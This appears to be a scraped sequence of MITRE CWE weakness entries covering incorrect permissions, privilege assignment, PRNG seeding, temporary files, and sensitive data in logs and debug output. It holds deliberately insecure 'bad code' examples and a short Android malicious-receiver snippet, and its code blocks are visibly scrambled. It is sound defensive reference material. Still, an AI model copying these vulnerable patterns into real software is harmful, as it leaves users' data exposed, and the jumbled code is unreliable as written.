file, err := os.Create(adminFile)
}if err != nil {
return err
}return nil
func changeModeOfAdminFile() error {
fileMode := os.FileMode(0440)
}if err := os.Chmod(adminFile, fileMode); err != nil {
return err
}return nil os.Create will create a file with 0666 permissions before umask if the specified file does not exist. A typical umask of 0022 would result in the file having 0644 permissions. That is, the file would have world-writable and world-readable permissions. In this scenario, it is advised to use the more customizable method of os.OpenFile with the os.O_WRONLY and os.O_CREATE flags specifying 0640 permissions to create the admin file. This is because on a typical system where the umask is 0022, the perm 0640 applied in os.OpenFile will result in a file of 0620 where only the owner and group can write. Example 5 The following command recursively sets world-readable permissions for a directory and all of its children: (bad code)
Example Language: Shell
chmod -R ugo+r DIRNAME
If this command is run from a program, the person calling the program might not expect that all the files under the directory will be world-readable. If the directory is expected to contain private data, this could become a security problem. Example 6 The following Azure command updates the settings for a storage account: (bad code)
Example Language: Shell
az storage account update --name <storage-account> --resource-group <resource-group> --allow-blob-public-access true
However, "Allow Blob Public Access" is set to true, meaning that anonymous/public users can access blobs. The command could be modified to disable "Allow Blob Public Access" by setting it to false. (good code)
Example Language: Shell
az storage account update --name <storage-account> --resource-group <resource-group> --allow-blob-public-access false
Example 7 The following Google Cloud Storage command gets the settings for a storage account named 'BUCKET_NAME': (informative)
Example Language: Shell
gsutil iam get gs://BUCKET_NAME
Suppose the command returns the following result: (bad code)
Example Language: JSON
{
"bindings":[{
}
"members":[
},
"projectEditor: PROJECT-ID",
],"projectOwner: PROJECT-ID" "role":"roles/storage.legacyBucketOwner" {
"members":[
]
"allUsers",
}"projectViewer: PROJECT-ID" ], "role":"roles/storage.legacyBucketReader" This result includes the "allUsers" or IAM role added as members, causing this policy configuration to allow public access to cloud storage resources. There would be a similar concern if "allAuthenticatedUsers" was present. The command could be modified to remove "allUsers" and/or "allAuthenticatedUsers" as follows: (good code)
Example Language: Shell
gsutil iam ch -d allUsers gs://BUCKET_NAME
gsutil iam ch -d allAuthenticatedUsers gs://BUCKET_NAME Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Maintenance
CWE-266: Incorrect Privilege Assignment
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterA product incorrectly assigns a privilege to a particular actor, creating an unintended sphere of control for that actor.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following example demonstrates the weakness. (bad code)
Example Language: C
seteuid(0);
/* do some stuff */ seteuid(getuid()); Example 2 The following example demonstrates the weakness. (bad code)
Example Language: Java
AccessController.doPrivileged(new PrivilegedAction() {
public Object run() {
// privileged code goes here, for example:
}System.loadLibrary("awt"); return null; // nothing to return Example 3 This application sends a special intent with a flag that allows the receiving application to read a data file for backup purposes. (bad code)
Example Language: Java
Intent intent = new Intent();
intent.setAction("com.example.BackupUserData"); intent.setData(file_uri); intent.addFlags(FLAG_GRANT_READ_URI_PERMISSION); sendBroadcast(intent); (attack code)
Example Language: Java
public class CallReceiver extends BroadcastReceiver {
@Override }public void onReceive(Context context, Intent intent) { Uri userData = intent.getData(); }stealUserData(userData); Any malicious application can register to receive this intent. Because of the FLAG_GRANT_READ_URI_PERMISSION included with the intent, the malicious receiver code can read the user's data. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-335: Incorrect Usage of Seeds in Pseudo-Random Number Generator (PRNG)
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product uses a Pseudo-Random Number Generator (PRNG) but does not correctly manage seeds.
PRNGs are deterministic and, while their output appears random, they cannot actually create entropy. They rely on cryptographically secure and unique seeds for entropy so proper seeding is critical to the secure operation of the PRNG. Management of seeds could be broken down into two main areas:
PRNGs require a seed as input to generate a stream of numbers that are functionally indistinguishable from random numbers. While the output is, in many cases, sufficient for cryptographic uses, the output of any PRNG is directly determined by the seed provided as input. If the seed can be ascertained by a third party, the entire output of the PRNG can be made known to them. As such, the seed should be kept secret and should ideally not be able to be guessed. For example, the current time may be a poor seed. Knowing the approximate time the PRNG was seeded greatly reduces the possible key space. Seeds do not necessarily need to be unique, but reusing seeds may open up attacks if the seed is discovered. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code uses a statistical PRNG to generate account IDs. (bad code)
Example Language: Java
private static final long SEED = 1234567890;
public int generateAccountID() { Random random = new Random(SEED); }return random.nextInt(); Because the program uses the same seed value for every invocation of the PRNG, its values are predictable, making the system vulnerable to attack. Example 2 Both of these examples use a statistical PRNG seeded with the current value of the system clock to generate a random number: (bad code)
Example Language: Java
Random random = new Random(System.currentTimeMillis());
int accountID = random.nextInt(); (bad code)
Example Language: C
srand(time());
int randNum = rand(); An attacker can easily predict the seed used by these PRNGs, and so also predict the stream of random numbers generated. Note these examples also exhibit CWE-338 (Use of Cryptographically Weak PRNG). Example 3 This code grabs some random bytes and uses them for a seed in a PRNG, in order to generate a new cryptographic key. (bad code)
Example Language: Python
# getting 2 bytes of randomness for the seeding the PRNG
seed = os.urandom(2) random.seed(a=seed) key = random.getrandbits(128) Since only 2 bytes are used as a seed, an attacker will only need to guess 2^16 (65,536) values before being able to replicate the state of the PRNG. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Maintenance
As of CWE 4.5, terminology related to randomness, entropy, and
predictability can vary widely. Within the developer and other
communities, "randomness" is used heavily. However, within
cryptography, "entropy" is distinct, typically implied as a
measurement. There are no commonly-used definitions, even within
standards documents and cryptography papers. Future versions of
CWE will attempt to define these terms and, if necessary,
distinguish between them in ways that are appropriate for
different communities but do not reduce the usability of CWE for
mapping, understanding, or other scenarios.
CWE-286: Incorrect User Management
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter
Users can be assigned to the wrong group (class) of permissions resulting in unintended access rights to sensitive objects.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Maintenance Maintenance
This item needs more work. Possible sub-categories include: user in wrong group, and user with insecure profile or "configuration". It also might be better expressed as a category than a weakness.
CWE-941: Incorrectly Specified Destination in a Communication Channel
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product creates a communication channel to initiate an outgoing request to an actor, but it does not correctly specify the intended destination for that actor.
Attackers at the destination may be able to spoof trusted servers to steal data or cause a denial of service. There are at least two distinct weaknesses that can cause the product to communicate with an unintended destination:
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This code listens on a port for DNS requests and sends the result to the requesting address. (bad code)
Example Language: Python
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind( (UDP_IP,UDP_PORT) ) while true: data = sock.recvfrom(1024)
if not data: break
(requestIP, nameToResolve) = parseUDPpacket(data) record = resolveName(nameToResolve) sendResponse(requestIP,record) This code sends a DNS record to a requesting IP address. UDP allows the source IP address to be easily changed ('spoofed'), thus allowing an attacker to redirect responses to a target, which may be then be overwhelmed by the network traffic. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-221: Information Loss or Omission
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product does not record, or improperly records, security-relevant information that leads to an incorrect decision or hampers later analysis.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This code logs suspicious multiple login attempts. (bad code)
Example Language: PHP
function login($userName,$password){
if(authenticate($userName,$password)){
return True; }else{ incrementLoginAttempts($userName); }if(recentLoginAttempts($userName) > 5){ writeLog("Failed login attempt by User: " . $userName . " at " + date('r') ); }This code only logs failed login attempts when a certain limit is reached. If an attacker knows this limit, they can stop their attack from being discovered by avoiding the limit. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-922: Insecure Storage of Sensitive Information
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product stores sensitive information without properly limiting read or write access by unauthorized actors.
If read access is not properly restricted, then attackers can steal the sensitive information. If write access is not properly restricted, then attackers can modify and possibly delete the data, causing incorrect results and possibly a denial of service.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. At least one OT product stored a password in plaintext. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
There is an overlapping relationship between insecure storage of sensitive information (CWE-922) and missing encryption of sensitive information (CWE-311). Encryption is often used to prevent an attacker from reading the sensitive data. However, encryption does not prevent the attacker from erasing or overwriting the data. While data tampering would be visible upon inspection, the integrity and availability of the data is compromised prior to the audit.
Maintenance
This is a high-level entry that includes children from various parts of the CWE research view (CWE-1000). Currently, most of the information is in these child entries. This entry will be made more comprehensive in later CWE versions.
CWE-377: Insecure Temporary File
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterCreating and using insecure temporary files can leave application and system data vulnerable to attack.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code uses a temporary file for storing intermediate data gathered from the network before it is processed. (bad code)
Example Language: C
if (tmpnam_r(filename)) {
FILE* tmp = fopen(filename,"wb+"); while((recv(sock,recvbuf,DATA_SIZE, 0) > 0)&(amt!=0)) amt = fwrite(recvbuf,1,DATA_SIZE,tmp); ... This otherwise unremarkable code is vulnerable to a number of different attacks because it relies on an insecure method for creating temporary files. The vulnerabilities introduced by this function and others are described in the following sections. The most egregious security problems related to temporary file creation have occurred on Unix-based operating systems, but Windows applications have parallel risks. This section includes a discussion of temporary file creation on both Unix and Windows systems. Methods and behaviors can vary between systems, but the fundamental risks introduced by each are reasonably constant. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Other Applications require temporary files so frequently that many different mechanisms exist for creating them in the C Library and Windows(R) API. Most of these functions are vulnerable to various forms of attacks. The functions designed to aid in the creation of temporary files can be broken into two groups based whether they simply provide a filename or actually open a new file.
CWE-215: Insertion of Sensitive Information Into Debugging Code
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product inserts sensitive information into debugging code, which could expose this information if the debugging code is not disabled in production.
When debugging, it may be necessary to report detailed information to the programmer. However, if the debugging code is not disabled when the product is operating in a production environment, then this sensitive information may be exposed to attackers.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following program changes its behavior based on a debug flag. (bad code)
Example Language: JSP
<% if (Boolean.getBoolean("debugEnabled")) {
%>
User account number: <%= acctNo %> <% } %> The code writes sensitive debug information to the client browser if the "debugEnabled" flag is set to true . Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-538: Insertion of Sensitive Information into Externally-Accessible File or Directory
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product places sensitive information into files or directories that are accessible to actors who are allowed to have access to the files, but not to the sensitive information.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In the following code snippet, a user's full name and credit card number are written to a log file. (bad code)
Example Language: Java
logger.info("Username: " + usernme + ", CCN: " + ccn);
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Maintenance
Depending on usage, this could be a weakness or a category. Further study of all its children is needed, and the entire sub-tree may need to be clarified. The current organization is based primarily on the exposure of sensitive information as a consequence, instead of as a primary weakness.
CWE-532: Insertion of Sensitive Information into Log File
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In the following code snippet, a user's full name and credit card number are written to a log file. (bad code)
Example Language: Java
logger.info("Username: " + usernme + ", CCN: " + ccn);
Example 2 This code stores location information about the current user: (bad code)
Example Language: Java
locationClient = new LocationClient(this, this, this);
locationClient.connect(); currentUser.setLocation(locationClient.getLastLocation()); ... catch (Exception e) { AlertDialog.Builder builder = new AlertDialog.Builder(this); }builder.setMessage("Sorry, this application has experienced an error."); AlertDialog alert = builder.create(); alert.show(); Log.e("ExampleActivity", "Caught exception: " + e + " While on User:" + User.toString()); When the application encounters an exception it will write the user object to the log. Because the user object contains location information, the user's location is also written to the log. Example 3 In the example below, the method getUserBankAccount retrieves a bank account object from a database using the supplied username and account number to query the database. If an SQLException is raised when querying the database, an error message is created and output to a log file. (bad code)
Example Language: Java
public BankAccount getUserBankAccount(String username, String accountNumber) {
BankAccount userAccount = null;
String query = null; try { if (isAuthorizedUser(username)) { } catch (SQLException ex) {query = "SELECT * FROM accounts WHERE owner = " }+ username + " AND accountID = " + accountNumber; DatabaseManager dbManager = new DatabaseManager(); Connection conn = dbManager.getConnection(); Statement stmt = conn.createStatement(); ResultSet queryResult = stmt.executeQuery(query); userAccount = (BankAccount)queryResult.getObject(accountNumber); String logMessage = "Unable to retrieve account information from database,\nquery: " + query; }Logger.getLogger(BankManager.class.getName()).log(Level.SEVERE, logMessage, ex); return userAccount; The error message that is created includes information about the database query that may contain sensitive information about the database or query logic. In this case, the error message will expose the table name and column names used in the database. This data could be used to simplify other attacks, such as SQL injection (CWE-89) to directly access the database. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-201: Insertion of Sensitive Information Into Sent Data
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
